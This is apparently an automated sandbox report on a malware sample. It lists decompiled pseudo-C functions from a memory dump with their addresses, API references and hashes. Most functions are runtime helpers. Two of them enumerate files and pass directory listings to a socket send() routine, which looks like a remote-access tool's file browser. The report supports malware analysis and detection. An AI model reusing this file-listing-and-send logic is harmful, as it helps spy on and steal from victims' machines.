Function 00446AF9, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00446AF9(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr* _v32;
				CHAR* _v36;
				signed int _v48;
				char _v286;
				signed int _v287;
				struct _WIN32_FIND_DATAA _v332;
				intOrPtr* _v336;
				signed int _v340;
				signed int _v344;
				intOrPtr _v372;
				signed int _t35;
				signed int _t40;
				signed int _t43;
				intOrPtr _t45;
				signed char _t47;
				intOrPtr* _t55;
				union _FINDEX_INFO_LEVELS _t57;
				signed int _t62;
				signed int _t65;
				void* _t72;
				void* _t74;
				signed int _t75;
				void* _t78;
				CHAR* _t79;
				intOrPtr* _t83;
				intOrPtr _t85;
				void* _t87;
				intOrPtr* _t88;
				signed int _t92;
				signed int _t96;
				void* _t101;
				intOrPtr _t102;
				signed int _t105;
				union _FINDEX_INFO_LEVELS _t106;
				void* _t111;
				intOrPtr _t112;
				void* _t113;
				signed int _t118;
				void* _t119;
				signed int _t120;
				void* _t121;
				void* _t122;

				_push(__ecx);
				_t83 = _a4;
				_t2 = _t83 + 1; // 0x1
				_t101 = _t2;
				do {
					_t35 =  *_t83;
					_t83 = _t83 + 1;
				} while (_t35 != 0);
				_push(__edi);
				_t105 = _a12;
				_t85 = _t83 - _t101 + 1;
				_v8 = _t85;
				if(_t85 <= (_t35 | 0xffffffff) - _t105) {
					_push(__ebx);
					_push(__esi);
					_t5 = _t105 + 1; // 0x1
					_t78 = _t5 + _t85;
					_t111 = E0043F348(_t85, _t78, 1);
					_pop(_t87);
					__eflags = _t105;
					if(_t105 == 0) {
						L6:
						_push(_v8);
						_t78 = _t78 - _t105;
						_t40 = E0044D309(_t87, _t111 + _t105, _t78, _a4);
						_t120 = _t119 + 0x10;
						__eflags = _t40;
						if(__eflags != 0) {
							goto L9;
						} else {
							_t72 = L00446D38(_a16, __eflags, _t111);
							E004401F5(0);
							_t74 = _t72;
							goto L8;
						}
					} else {
						_push(_t105);
						_t75 = E0044D309(_t87, _t111, _t78, _a8);
						_t120 = _t119 + 0x10;
						__eflags = _t75;
						if(_t75 != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E0043698A();
							asm("int3");
							_t118 = _t120;
							_t121 = _t120 - 0x150;
							_t43 =  *0x46a00c; // 0x1e1e4200
							_v48 = _t43 ^ _t118;
							_t88 = _v32;
							_push(_t78);
							_t79 = _v36;
							_push(_t111);
							_t112 = _v332.cAlternateFileName;
							_push(_t105);
							_v372 = _t112;
							while(1) {
								__eflags = _t88 - _t79;
								if(_t88 == _t79) {
									break;
								}
								_t45 =  *_t88;
								__eflags = _t45 - 0x2f;
								if(_t45 != 0x2f) {
									__eflags = _t45 - 0x5c;
									if(_t45 != 0x5c) {
										__eflags = _t45 - 0x3a;
										if(_t45 != 0x3a) {
											_t88 = E0044F5C0(_t79, _t88);
											continue;
										}
									}
								}
								break;
							}
							_t102 =  *_t88;
							__eflags = _t102 - 0x3a;
							if(_t102 != 0x3a) {
								L19:
								_t106 = 0;
								__eflags = _t102 - 0x2f;
								if(_t102 == 0x2f) {
									L23:
									_t47 = 1;
									__eflags = 1;
								} else {
									__eflags = _t102 - 0x5c;
									if(_t102 == 0x5c) {
										goto L23;
									} else {
										__eflags = _t102 - 0x3a;
										if(_t102 == 0x3a) {
											goto L23;
										} else {
											_t47 = 0;
										}
									}
								}
								_t90 = _t88 - _t79 + 1;
								asm("sbb eax, eax");
								_v340 =  ~(_t47 & 0x000000ff) & _t88 - _t79 + 0x00000001;
								L00431F00(_t106,  &_v332, _t106, 0x140);
								_t122 = _t121 + 0xc;
								_t113 = FindFirstFileExA(_t79, _t106,  &_v332, _t106, _t106, _t106);
								_t55 = _v336;
								__eflags = _t113 - 0xffffffff;
								if(_t113 != 0xffffffff) {
									_t92 =  *((intOrPtr*)(_t55 + 4)) -  *_t55;
									__eflags = _t92;
									_t93 = _t92 >> 2;
									_v344 = _t92 >> 2;
									do {
										__eflags = _v332.cFileName - 0x2e;
										if(_v332.cFileName != 0x2e) {
											L36:
											_push(_t55);
											_t57 = E00446AF9(_t79, _t93, _t106, _t113,  &(_v332.cFileName), _t79, _v340);
											_t122 = _t122 + 0x10;
											__eflags = _t57;
											if(_t57 != 0) {
												goto L26;
											} else {
												goto L37;
											}
										} else {
											_t93 = _v287;
											__eflags = _t93;
											if(_t93 == 0) {
												goto L37;
											} else {
												__eflags = _t93 - 0x2e;
												if(_t93 != 0x2e) {
													goto L36;
												} else {
													__eflags = _v286;
													if(_v286 == 0) {
														goto L37;
													} else {
														goto L36;
													}
												}
											}
										}
										goto L40;
										L37:
										_t62 = FindNextFileA(_t113,  &_v332);
										__eflags = _t62;
										_t55 = _v336;
									} while (_t62 != 0);
									_t103 =  *_t55;
									_t96 = _v344;
									_t65 =  *((intOrPtr*)(_t55 + 4)) -  *_t55 >> 2;
									__eflags = _t96 - _t65;
									if(_t96 != _t65) {
										L0043AF20(_t79, _t106, _t113, _t103 + _t96 * 4, _t65 - _t96, 4, E00446951);
									}
								} else {
									_push(_t55);
									_t57 = E00446AF9(_t79, _t90, _t106, _t113, _t79, _t106, _t106);
									L26:
									_t106 = _t57;
								}
								__eflags = _t113 - 0xffffffff;
								if(_t113 != 0xffffffff) {
									FindClose(_t113);
								}
							} else {
								__eflags = _t88 -  &(_t79[1]);
								if(_t88 ==  &(_t79[1])) {
									goto L19;
								} else {
									_push(_t112);
									E00446AF9(_t79, _t88, 0, _t112, _t79, 0, 0);
								}
							}
							__eflags = _v12 ^ _t118;
							return L0042FD1B(_v12 ^ _t118);
						} else {
							goto L6;
						}
					}
				} else {
					_t74 = 0xc;
					L8:
					return _t74;
				}
				L40:
			}

0x00446afe
0x00446aff
0x00446b02
0x00446b02
0x00446b05
0x00446b05
0x00446b07
0x00446b08
0x00446b11
0x00446b12
0x00446b15
0x00446b18
0x00446b1d
0x00446b24
0x00446b25
0x00446b26
0x00446b29
0x00446b33
0x00446b36
0x00446b37
0x00446b39
0x00446b4d
0x00446b4d
0x00446b50
0x00446b5a
0x00446b5f
0x00446b62
0x00446b64
0x00000000
0x00446b66
0x00446b6a
0x00446b73
0x00446b79
0x00000000
0x00446b7c
0x00446b3b
0x00446b3b
0x00446b41
0x00446b46
0x00446b49
0x00446b4b
0x00446b82
0x00446b84
0x00446b85
0x00446b86
0x00446b87
0x00446b88
0x00446b89
0x00446b8e
0x00446b92
0x00446b94
0x00446b9a
0x00446ba1
0x00446ba4
0x00446ba7
0x00446ba8
0x00446bab
0x00446bac
0x00446baf
0x00446bb0
0x00446bd1
0x00446bd1
0x00446bd3
0x00000000
0x00000000
0x00446bb8
0x00446bba
0x00446bbc
0x00446bbe
0x00446bc0
0x00446bc2
0x00446bc4
0x00446bcf
0x00000000
0x00446bcf
0x00446bc4
0x00446bc0
0x00000000
0x00446bbc
0x00446bd5
0x00446bd7
0x00446bda
0x00446bf3
0x00446bf3
0x00446bf5
0x00446bf8
0x00446c08
0x00446c0a
0x00446c0a
0x00446bfa
0x00446bfa
0x00446bfd
0x00000000
0x00446bff
0x00446bff
0x00446c02
0x00000000
0x00446c04
0x00446c04
0x00446c04
0x00446c02
0x00446bfd
0x00446c10
0x00446c18
0x00446c1c
0x00446c2a
0x00446c2f
0x00446c44
0x00446c46
0x00446c4c
0x00446c4f
0x00446c81
0x00446c81
0x00446c83
0x00446c86
0x00446c8c
0x00446c8c
0x00446c93
0x00446cad
0x00446cad
0x00446cbc
0x00446cc1
0x00446cc4
0x00446cc6
0x00000000
0x00000000
0x00000000
0x00000000
0x00446c95
0x00446c95
0x00446c9b
0x00446c9d
0x00000000
0x00446c9f
0x00446c9f
0x00446ca2
0x00000000
0x00446ca4
0x00446ca4
0x00446cab
0x00000000
0x00000000
0x00000000
0x00000000
0x00446cab
0x00446ca2
0x00446c9d
0x00000000
0x00446cc8
0x00446cd0
0x00446cd6
0x00446cd8
0x00446cd8
0x00446ce0
0x00446ce5
0x00446ced
0x00446cf0
0x00446cf2
0x00446d06
0x00446d0b
0x00446c51
0x00446c51
0x00446c55
0x00446c5d
0x00446c5d
0x00446c5d
0x00446c5f
0x00446c62
0x00446c65
0x00446c65
0x00446bdc
0x00446bdf
0x00446be1
0x00000000
0x00446be3
0x00446be3
0x00446be9
0x00446bee
0x00446be1
0x00446c72
0x00446c7d
0x00000000
0x00000000
0x00000000
0x00446b4b
0x00446b1f
0x00446b21
0x00446b7d
0x00446b81
0x00446b81
0x00000000

Strings

., xrefs: 00446C8C

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: 4e26ac1120144959bdd7c2282b076e0a5df16f41745d37f92cab398324db5c20
Instruction ID: 902a4e4d1e087740e0a32b3358ab9b92e53e313bfb578708a00ec5a0f4c6ba11
Opcode Fuzzy Hash: 4e26ac1120144959bdd7c2282b076e0a5df16f41745d37f92cab398324db5c20
Instruction Fuzzy Hash: CD313771800259AFDB248E79CC84EFBBBBDDF86318F0141AEF818D7251E634AE408B55

Uniqueness

Uniqueness Score: -1.00%

Function 004423BA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,0043DD1F,?,00000004), ref: 0044240D

Strings

GetLocaleInfoEx, xrefs: 004423D5

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: InfoLocale
String ID: GetLocaleInfoEx
API String ID: 2299586839-2904428671
Opcode ID: 30b810839b59ba11a6eae0aeef628e107f6b5eb1dc1d371d29b2301ee2a0ab54
Instruction ID: 96fabd543f80631915bdd4e6a3d78e1bd42830cecee988cc8e1c6fddece1edfb
Opcode Fuzzy Hash: 30b810839b59ba11a6eae0aeef628e107f6b5eb1dc1d371d29b2301ee2a0ab54
Instruction Fuzzy Hash: 89F0F631640318BBDB11AF61DC02F6E7F65EF04B02F50402AFC0567292CA799E259A9D

Uniqueness

Uniqueness Score: -1.00%

Function 004153F5, Relevance: 3.2, APIs: 2, Instructions: 245
fileCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E004153F5(char* __edx, void* __eflags, char _a8) {
				struct _WIN32_FIND_DATAW _v1028;
				char _v1036;
				char _v1064;
				char _v1088;
				void* _v1092;
				char _v1100;
				char _v1116;
				void* _v1120;
				char _v1128;
				char _v1136;
				char _v1152;
				char _v1156;
				char _v1160;
				void* _v1164;
				char _v1172;
				char _v1176;
				void* _v1188;
				char _v1196;
				void* _v1200;
				void* _v1204;
				char _v1208;
				char _v1220;
				char _v1224;
				char _v1228;
				char _v1232;
				char _v1236;
				char _v1240;
				char _v1252;
				void* __ebx;
				void* __esi;
				void* __ebp;
				intOrPtr* _t63;
				int _t85;
				int _t91;
				void* _t102;
				WCHAR* _t108;
				void* _t109;
				char* _t113;
				void* _t115;
				void* _t116;
				void* _t130;
				void* _t133;
				void* _t228;
				void* _t229;
				signed int _t234;
				void* _t237;
				void* _t238;
				void* _t239;
				void* _t242;

				_t242 = __eflags;
				_t213 = __edx;
				_push(_t139);
				_t63 = L00401F95( &_a8);
				E004042A6( &_a8,  &_v1100, 4, 0xffffffff);
				_t237 = (_t234 & 0xfffffff8) - 0x4b4;
				E004020EC(_t139, _t237, __edx, _t242, 0x46c238);
				_t238 = _t237 - 0x18;
				E004020EC(_t139, _t238, __edx, _t242,  &_v1116);
				E00417478( &_v1252, _t213);
				_t239 = _t238 + 0x30;
				_t228 =  *_t63 - 0x19;
				if(_t228 == 0) {
					E004020D5(_t139,  &_v1220);
					_t213 = 0x46c880;
					E00407514( &_v1172, 0x46c880, __eflags, L"\\*");
					_t229 = FindFirstFileW(L00401EEB( &_v1172),  &_v1028);
					__eflags = _t229 - 0xffffffff;
					if(__eflags == 0) {
						L14:
						E004020EC(_t139, _t239 - 0x18, _t213, __eflags,  &_v1220);
						_push(0x5d);
						E00404AA4(_t139, 0x46c918, _t213, __eflags);
						L00401EF0();
						E00401FC7();
						goto L15;
					}
					E0040427F(_t139,  &_v1196,  &(_v1028.cFileName));
					_t213 = ".";
					_t85 = E004074E4(__eflags);
					_t139 = _t85;
					L00401EF0();
					__eflags = _t85;
					if(__eflags != 0) {
						E00401FD1( &_v1228, ".", _t229, E004020AB(_t139,  &_v1196, ".", __eflags,  &_v1028, 0x250));
						E00401FC7();
					}
					while(1) {
						__eflags = FindNextFileW(_t229,  &_v1028);
						if(__eflags == 0) {
							goto L14;
						}
						E0040427F(_t139,  &_v1196,  &(_v1028.cFileName));
						_t213 = L"..";
						_t91 = E004074E4(__eflags);
						_t139 = _t91;
						L00401EF0();
						__eflags = _t91;
						if(__eflags != 0) {
							E00403436(E004020AB(_t139,  &_v1196, L"..", __eflags,  &_v1028, 0x250));
							E00401FC7();
						}
					}
					goto L14;
				} else {
					_t244 = _t228 == 1;
					if(_t228 == 1) {
						_t102 = E004172DA( &_v1152, L00401E49( &_v1232, _t213, _t244, 1));
						E00403030( &_v1176, E00407514( &_v1128, 0x46c880, _t244, "\\"), _t102);
						L00401EF0();
						L00401EF0();
						E004020D5(_t139,  &_v1224);
						_t108 = L00401EEB( &_v1176);
						_t213 =  &_v1224;
						_t109 = E004179DC(_t108,  &_v1224);
						_t245 = _t109;
						if(_t109 != 0) {
							_t113 = L00401F95(L00401E49(0x46c578,  &_v1224, _t245, 0x1b));
							_t246 =  *_t113 - 1;
							if( *_t113 == 1) {
								_t130 = E00402489();
								E00405A7C( &_v1028, L00401F95(0x46c560), _t130);
								_t133 = E00402489();
								E00401FD1( &_v1240, _t213, 0x46c560, E00405BA4(_t139,  &_v1036, _t213,  &_v1156, L00401F95( &_v1228), _t133));
								E00401FC7();
							}
							_t115 = L00401E49( &_v1232, _t213, _t246, 2);
							_t116 = L00401E49( &_v1236, _t213, _t246, 0);
							_t213 = L00402F93(_t139,  &_v1160, L00402F93(_t139,  &_v1136, L00402F93(_t139,  &_v1088, L00402F93(_t139,  &_v1064, L00402FB7( &_v1208, L00401E49( &_v1240, _t213, _t246, 1), 0x46c238), _t246, _t116), _t246, 0x46c238), _t246, _t115), _t246, 0x46c238);
							L00402F93(_t139, _t239 - 0x18, _t122, _t246,  &_v1220);
							_push(0x5e);
							E00404AA4(_t139, 0x46c918, _t122, _t246);
							E00401FC7();
							E00401FC7();
							E00401FC7();
							E00401FC7();
							E00401FC7();
						}
						E00401FC7();
						L00401EF0();
					}
					L15:
					L00401E74( &_v1252, _t213);
					E00401FC7();
					return E00401FC7();
				}
			}

0x004153f5
0x004153f5
0x00415404
0x00415407
0x0041541d
0x00415422
0x0041542d
0x00415432
0x0041543f
0x00415448
0x0041544d
0x00415450
0x00415453
0x00415620
0x0041562a
0x00415633
0x00415651
0x00415653
0x00415656
0x0041571d
0x00415727
0x0041572c
0x00415733
0x0041573c
0x00415745
0x00000000
0x00415745
0x00415668
0x0041566d
0x00415674
0x0041567d
0x0041567f
0x00415684
0x00415686
0x004156a3
0x004156ac
0x004156ac
0x0041570e
0x00415719
0x0041571b
0x00000000
0x00000000
0x004156c5
0x004156ca
0x004156d1
0x004156da
0x004156dc
0x004156e1
0x004156e3
0x00415700
0x00415709
0x00415709
0x004156e3
0x00000000
0x00415459
0x00415459
0x0041545c
0x00415473
0x00415496
0x004154a0
0x004154a9
0x004154b2
0x004154bb
0x004154c0
0x004154c6
0x004154cb
0x004154cd
0x004154e1
0x004154e6
0x004154e9
0x004154f2
0x00415507
0x00415510
0x00415536
0x0041553f
0x0041553f
0x00415555
0x00415562
0x004155bc
0x004155c0
0x004155c6
0x004155cd
0x004155d6
0x004155df
0x004155eb
0x004155f7
0x00415600
0x00415600
0x00415609
0x00415612
0x00415612
0x0041574a
0x0041574e
0x0041575a
0x0041576d
0x0041576d

APIs

FindFirstFileW.KERNEL32(00000000,?), ref: 0041564B
FindNextFileW.KERNEL32(00000000,?,?), ref: 00415717

Part of subcall function 00407514: char_traits.LIBCPMT ref: 0040752F

Part of subcall function 004179DC: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,00000000,00000000,?,004136FE), ref: 004179F9

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: File$Find$CreateFirstNextchar_traits
String ID:
API String ID: 3100282071-0
Opcode ID: f6406bf69a639870cb7ed549c25a6e51ffe7d1f05012d5fe626152e7071842e5
Instruction ID: fc299df16d418c96fbb3dc7ae8f09247cd9b87a8735511f9070920f35661dee3
Opcode Fuzzy Hash: f6406bf69a639870cb7ed549c25a6e51ffe7d1f05012d5fe626152e7071842e5
Instruction Fuzzy Hash: DB81A6311183409BC314F722C856EEF73A9AF91348F40453FF596671E2EF389A49CA9A

Uniqueness

Uniqueness Score: -1.00%

Function 004061C3, Relevance: 3.1, APIs: 2, Instructions: 86
fileCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E004061C3(char _a4) {
				char _v28;
				char _v52;
				char _v76;
				struct _WIN32_FIND_DATAW _v668;
				void* __ebx;
				void* __esi;
				int _t29;
				void* _t34;
				void* _t49;
				void* _t73;
				void* _t74;

				_t73 = FindFirstFileW(L00401EEB( &_a4),  &_v668);
				_t77 = _t73 - 0xffffffff;
				if(_t73 != 0xffffffff) {
					E004020D5(_t49,  &_v28);
					E0040427F(_t49,  &_v52,  &(_v668.cFileName));
					_t71 = ".";
					_t29 = E004074E4(__eflags);
					_t50 = _t29;
					L00401EF0();
					__eflags = _t29;
					if(__eflags != 0) {
						E00401FD1( &_v28, ".", _t73, E004020AB(_t50,  &_v52, ".", __eflags,  &_v668, 0x250));
						L5:
						E00401FC7();
					}
					__eflags = FindNextFileW(_t73,  &_v668);
					if(__eflags != 0) {
						_t34 = E004020AB(_t50,  &_v76, _t71, __eflags,  &_v668, 0x250);
						_t71 =  &_v28;
						E00401FD1( &_v28,  &_v28, _t73, E004074F0(_t50,  &_v52,  &_v28, __eflags, _t34));
						E00401FC7();
						goto L5;
					}
					E004020EC(_t50, _t74 - 0x18, _t71, __eflags,  &_v28);
					_push(0x50);
					E00404AA4(_t50, 0x46c2e8, _t71, __eflags);
					E00401FC7();
				} else {
					E0041739C(_t49, _t74 - 0x18,  &_a4);
					_push(0x54);
					E00404AA4(_t49, 0x46c2e8,  &_a4, _t77);
				}
				return L00401EF0();
			}

0x004061e4
0x004061e6
0x004061e9
0x0040620c
0x0040621b
0x00406220
0x00406227
0x0040622f
0x00406231
0x00406236
0x00406238
0x00406252
0x00406291
0x00406291
0x00406291
0x004062a4
0x004062a6
0x0040626b
0x00406271
0x00406281
0x00406289
0x00000000
0x0040628e
0x004062b1
0x004062b6
0x004062bd
0x004062c5
0x004061eb
0x004061f3
0x004061f8
0x004061ff
0x004061ff
0x004062d7

APIs

FindFirstFileW.KERNEL32(00000000,?,?,0046C238), ref: 004061DE
FindNextFileW.KERNEL32(00000000,?,?), ref: 0040629E

Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: FileFind$FirstNextsend
String ID:
API String ID: 4113138495-0
Opcode ID: 29815acca4aebacfe9e3fd440fb7b39bca5b157ce94ab5209849513e5f1e04ad
Instruction ID: 05b06413529d47d56342622e5ae20bd3e82c8e6dc30fd3fa753989dbabbba416
Opcode Fuzzy Hash: 29815acca4aebacfe9e3fd440fb7b39bca5b157ce94ab5209849513e5f1e04ad
Instruction Fuzzy Hash: 442198319102099ACB14FBA6CC96DEF7778AF55304F40017FF906761D2EF385A49CA99

Uniqueness

Uniqueness Score: -1.00%

Function 0042F9B4, Relevance: 1.6, APIs: 1, Instructions: 132
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E0042F9B4(intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _t51;
				signed int _t53;
				signed int _t56;
				signed int _t57;
				intOrPtr _t59;
				signed int _t60;
				signed int _t62;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr* _t70;
				intOrPtr _t76;
				intOrPtr _t81;
				intOrPtr* _t83;
				signed int _t84;
				signed int _t87;

				_t81 = __edx;
				 *0x46ad0c =  *0x46ad0c & 0x00000000;
				 *0x46a010 =  *0x46a010 | 1;
				if(IsProcessorFeaturePresent(0xa) == 0) {
					L20:
					return 0;
				}
				_v20 = _v20 & 0x00000000;
				 *0x46a010 =  *0x46a010 | 0x00000002;
				 *0x46ad0c = 1;
				_t83 =  &_v44;
				_push(1);
				asm("cpuid");
				_pop(_t67);
				 *_t83 = 0;
				 *((intOrPtr*)(_t83 + 4)) = 1;
				 *((intOrPtr*)(_t83 + 8)) = 0;
				 *((intOrPtr*)(_t83 + 0xc)) = _t81;
				_v12 = _v44;
				_t51 = 1;
				_t76 = 0;
				_push(1);
				asm("cpuid");
				_pop(_t68);
				 *_t83 = _t51;
				 *((intOrPtr*)(_t83 + 4)) = _t67;
				 *((intOrPtr*)(_t83 + 8)) = _t76;
				 *((intOrPtr*)(_t83 + 0xc)) = _t81;
				if((_v32 ^ 0x49656e69 | _v36 ^ 0x6c65746e | _v40 ^ 0x756e6547) != 0) {
					L9:
					_t84 =  *0x46ad10; // 0x2
					L10:
					_v28 = _v32;
					_t53 = _v36;
					_v8 = _t53;
					_v24 = _t53;
					if(_v12 >= 7) {
						_t59 = 7;
						_push(_t68);
						asm("cpuid");
						_t70 =  &_v44;
						 *_t70 = _t59;
						 *((intOrPtr*)(_t70 + 4)) = _t68;
						 *((intOrPtr*)(_t70 + 8)) = 0;
						 *((intOrPtr*)(_t70 + 0xc)) = _t81;
						_t60 = _v40;
						_v20 = _t60;
						_t53 = _v8;
						if((_t60 & 0x00000200) != 0) {
							 *0x46ad10 = _t84 | 0x00000002;
						}
					}
					if((_t53 & 0x00100000) != 0) {
						 *0x46a010 =  *0x46a010 | 0x00000004;
						 *0x46ad0c = 2;
						if((_t53 & 0x08000000) != 0 && (_t53 & 0x10000000) != 0) {
							asm("xgetbv");
							_v16 = _t53;
							_v12 = _t81;
							if((_v16 & 0x00000006) == 6 && 0 == 0) {
								_t56 =  *0x46a010; // 0x2f
								_t57 = _t56 | 0x00000008;
								 *0x46ad0c = 3;
								 *0x46a010 = _t57;
								if((_v20 & 0x00000020) != 0) {
									 *0x46ad0c = 5;
									 *0x46a010 = _t57 | 0x00000020;
								}
							}
						}
					}
					goto L20;
				}
				_t62 = _v44 & 0x0fff3ff0;
				if(_t62 == 0x106c0 || _t62 == 0x20660 || _t62 == 0x20670 || _t62 == 0x30650 || _t62 == 0x30660 || _t62 == 0x30670) {
					_t87 =  *0x46ad10; // 0x2
					_t84 = _t87 | 0x00000001;
					 *0x46ad10 = _t84;
					goto L10;
				} else {
					goto L9;
				}
			}

0x0042f9b4
0x0042f9b7
0x0042f9c5
0x0042f9d4
0x0042fb47
0x0042fb4d
0x0042fb4d
0x0042f9da
0x0042f9e0
0x0042f9eb
0x0042f9f1
0x0042f9f4
0x0042f9f5
0x0042f9f9
0x0042f9fa
0x0042f9fc
0x0042f9ff
0x0042fa02
0x0042fa0b
0x0042fa2a
0x0042fa2d
0x0042fa2e
0x0042fa2f
0x0042fa33
0x0042fa34
0x0042fa36
0x0042fa39
0x0042fa3c
0x0042fa3f
0x0042fa84
0x0042fa84
0x0042fa8a
0x0042fa91
0x0042fa94
0x0042fa97
0x0042fa9a
0x0042fa9d
0x0042faa1
0x0042faa4
0x0042faa5
0x0042faaa
0x0042faad
0x0042faaf
0x0042fab2
0x0042fab5
0x0042fab8
0x0042fac0
0x0042fac3
0x0042fac6
0x0042facb
0x0042facb
0x0042fac6
0x0042fad8
0x0042fada
0x0042fae1
0x0042faf0
0x0042fafb
0x0042fafe
0x0042fb01
0x0042fb12
0x0042fb18
0x0042fb1d
0x0042fb20
0x0042fb2e
0x0042fb33
0x0042fb38
0x0042fb42
0x0042fb42
0x0042fb33
0x0042fb12
0x0042faf0
0x00000000
0x0042fad8
0x0042fa44
0x0042fa4e
0x0042fa73
0x0042fa79
0x0042fa7c
0x00000000
0x00000000
0x00000000
0x00000000

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 0042F9CD

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: d7609121f321f4e7d9d393e1578f2eb6653ce81b8d693f1216ef69d978b005de
Instruction ID: 1b349e86bd2dcb401b8587f5fe98d601c7c16f63658581765740280450a0f810
Opcode Fuzzy Hash: d7609121f321f4e7d9d393e1578f2eb6653ce81b8d693f1216ef69d978b005de
Instruction Fuzzy Hash: BE41E071A006188BEB14CF55E88579EBBF4FB08314FA0853BD409E7350E3B8A924CF99

Uniqueness

Uniqueness Score: -1.00%

Function 0044A593, Relevance: 1.6, APIs: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E0044A593(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				short _v248;
				void* __ebp;
				signed int _t16;
				signed int _t22;
				void* _t24;
				void* _t31;
				void* _t35;
				signed int* _t50;
				int _t53;
				signed int _t54;

				_t16 =  *0x46a00c; // 0x1e1e4200
				_v8 = _t16 ^ _t54;
				_t35 = L00441CE2(__ebx, __ecx, __edx);
				_t50 =  *(L00441CE2(_t35, __ecx, __edx) + 0x34c);
				_t53 = E0044A66B(_a4);
				asm("sbb ecx, ecx");
				_t22 = GetLocaleInfoW(_t53, ( ~( *(_t35 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78);
				if(_t22 != 0) {
					_t24 = L0044CF51(_t35, _t50, _t53,  *((intOrPtr*)(_t35 + 0x50)),  &_v248);
					if(_t24 != 0) {
						if( *(_t35 + 0x60) == 0 &&  *((intOrPtr*)(_t35 + 0x5c)) != 0) {
							_t31 = L0044CF51(_t35, _t50, _t53,  *((intOrPtr*)(_t35 + 0x50)),  &_v248);
							if(_t31 == 0) {
								_push(_t50);
								_push(_t31);
								goto L9;
							}
						}
					} else {
						if( *(_t35 + 0x60) != _t24) {
							L10:
							 *_t50 =  *_t50 | 0x00000004;
							_t50[1] = _t53;
							_t50[2] = _t53;
						} else {
							_push(_t50);
							_push(1);
							L9:
							_push(_t53);
							if(E0044A7C3(_t35) != 0) {
								goto L10;
							}
						}
					}
				} else {
					 *_t50 =  *_t50 & _t22;
				}
				return L0042FD1B(_v8 ^ _t54);
			}

0x0044a59e
0x0044a5a5
0x0044a5b3
0x0044a5bb
0x0044a5ca
0x0044a5d6
0x0044a5e7
0x0044a5ef
0x0044a600
0x0044a609
0x0044a619
0x0044a62b
0x0044a634
0x0044a636
0x0044a637
0x00000000
0x0044a637
0x0044a634
0x0044a60b
0x0044a60e
0x0044a645
0x0044a645
0x0044a648
0x0044a64b
0x0044a610
0x0044a610
0x0044a611
0x0044a638
0x0044a638
0x0044a643
0x00000000
0x00000000
0x0044a643
0x0044a60e
0x0044a5f1
0x0044a5f1
0x0044a5f3
0x0044a668

APIs

Part of subcall function 00441CE2: GetLastError.KERNEL32(?,00000000,0043B8C2,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441CE6
Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D19
Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D5A
Part of subcall function 00441CE2: _abort.LIBCMT ref: 00441D60

Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D41
Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D4E

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044A5E7

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: ErrorLast$_free$InfoLocale_abort
String ID:
API String ID: 1663032902-0
Opcode ID: 1d23a962e4247796f6940d6c6d10ae8ecf88f37509316fbaa38232d644d664f4
Instruction ID: d815766c36d9954a4c820c073ba9809893cec4c66f47e331b0827f9a13c2a0fe
Opcode Fuzzy Hash: 1d23a962e4247796f6940d6c6d10ae8ecf88f37509316fbaa38232d644d664f4
Instruction Fuzzy Hash: 1F21D03258020AABFB249E25DC86BBB73A8EB04314F14407BF905C6241EB3CED55CB5E

Uniqueness

Uniqueness Score: -1.00%

Function 0044A21B, Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule
